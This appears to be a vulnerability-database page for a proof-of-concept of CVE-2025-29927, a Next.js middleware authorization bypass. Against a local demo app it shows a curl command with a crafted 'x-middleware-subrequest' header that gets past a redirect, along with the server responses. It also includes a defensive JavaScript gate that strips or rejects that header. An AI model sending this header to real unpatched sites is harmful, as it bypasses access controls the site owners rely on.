Related vulnerability
Description
Demo for Next.js middleware bypass - CVE-2025-29927
Introduction
# CVE-2025-29927 Demo
Original writeup: https://zhero-web-sec.github.io/research-and-things/nextjs-and-the-corrupt-middleware
## Setup
First, install the dependencies and run the development server:
```bash
npm i
npm run dev
```
Open [http://localhost:3000](http://localhost:3000) with your browser to see the result.
## Trying out the bypass
`curl -I http://localhost:3000`
```http
HTTP/1.1 307 Temporary Redirect
location: /403
Date: Mon, 24 Mar 2025 08:02:50 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```
`curl -I -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000`
```http
HTTP/1.1 200 OK
Vary: RSC, Next-Router-State-Tree, Next-Router-Prefetch, Next-Router-Segment-Prefetch, Accept-Encoding
link: </_next/static/media/569ce4b8f30dc480-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/media/93f479601ee12b01-s.p.woff2>; rel=preload; as="font"; crossorigin=""; type="font/woff2", </_next/static/css/app/layout.css?v=1742803407039>; rel=preload; as="style"
Cache-Control: no-store, must-revalidate
X-Powered-By: Next.js
Content-Type: text/html; charset=utf-8
Date: Mon, 24 Mar 2025 08:03:27 GMT
Connection: keep-alive
Keep-Alive: timeout=5
```
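The bypass above only works because an attacker-controlled `x-middleware-subrequest` header reaches Next.js. As an added example that is not part of this PoC repository, the following edge-side check (written for a Node reverse proxy or API gateway; the function names are my own) refuses or strips that header before forwarding, so the middleware redirect to `/403` is still enforced:

```javascript
// Added example (not from the PoC repo): gate requests at the edge so that the
// internal `x-middleware-subrequest` header shown in the bypass never reaches Next.js.
// Assumption: `headers` is a plain object like Node's IncomingMessage.headers.

const BLOCKED_HEADER = 'x-middleware-subrequest';

// True when the request carries the internal header under any spelling
// (HTTP header names are case-insensitive, so compare lower-cased).
function carriesInternalHeader(headers) {
  return Object.keys(headers).some((name) => name.toLowerCase() === BLOCKED_HEADER);
}

// Copy of the headers with every spelling of the blocked header removed.
function stripInternalHeader(headers) {
  const clean = {};
  for (const [name, value] of Object.entries(headers)) {
    if (name.toLowerCase() !== BLOCKED_HEADER) clean[name] = value;
  }
  return clean;
}

// Edge decision: reject (default, and the stricter choice) or strip-and-forward.
// Returns { action, status?, headers } so the caller can log and act on it.
function gateRequest(headers, { reject = true } = {}) {
  if (!carriesInternalHeader(headers)) return { action: 'forward', headers };
  const cleaned = stripInternalHeader(headers);
  if (reject) return { action: 'reject', status: 400, headers: cleaned };
  return { action: 'forward', headers: cleaned };
}

// Constructed sample requests: one benign, two mirroring the README's bypass curl
// (one with the header name as typed, one lower-cased as Node would present it).
const benign = { host: 'localhost:3000', 'user-agent': 'curl/8.0' };
const bypass = {
  host: 'localhost:3000',
  'X-Middleware-Subrequest': 'middleware:middleware:middleware:middleware:middleware',
};
const bypassLower = { host: 'localhost:3000', [BLOCKED_HEADER]: 'middleware' };

console.log(gateRequest(benign).action);      // forward
console.log(gateRequest(bypass).action);      // reject
console.log(gateRequest(bypassLower).action); // reject
```

Upgrading Next.js remains the real fix; this gate is a compensating control for the window before the patched version is deployed.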
File snapshot
[4.0K] /data/pocs/cf26b64aa90d787a4a95449422d116596e27cfb3
├── [ 393] eslint.config.mjs
├── [1.0K] LICENSE
├── [ 133] next.config.ts
├── [ 568] package.json
├── [323K] package-lock.json
├── [ 81] postcss.config.mjs
├── [4.0K] public
│ ├── [ 391] file.svg
│ ├── [1.0K] globe.svg
│ ├── [1.3K] next.svg
│ ├── [ 128] vercel.svg
│ └── [ 385] window.svg
├── [1.2K] README.md
├── [4.0K] src
│ ├── [4.0K] app
│ │ ├── [4.0K] 403
│ │ │ └── [ 640] page.tsx
│ │ ├── [ 25K] favicon.ico
│ │ ├── [ 488] globals.css
│ │ ├── [ 689] layout.tsx
│ │ └── [ 433] page.tsx
│ └── [ 662] middleware.ts
└── [ 602] tsconfig.json
4 directories, 19 files
Notes
1. It is recommended to access the PoC through the original source first.
2. If the source is unavailable or inaccessible, send an email to f.jinxu#gmail.com to request a local snapshot (replace # with @).
3. 神龙 has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.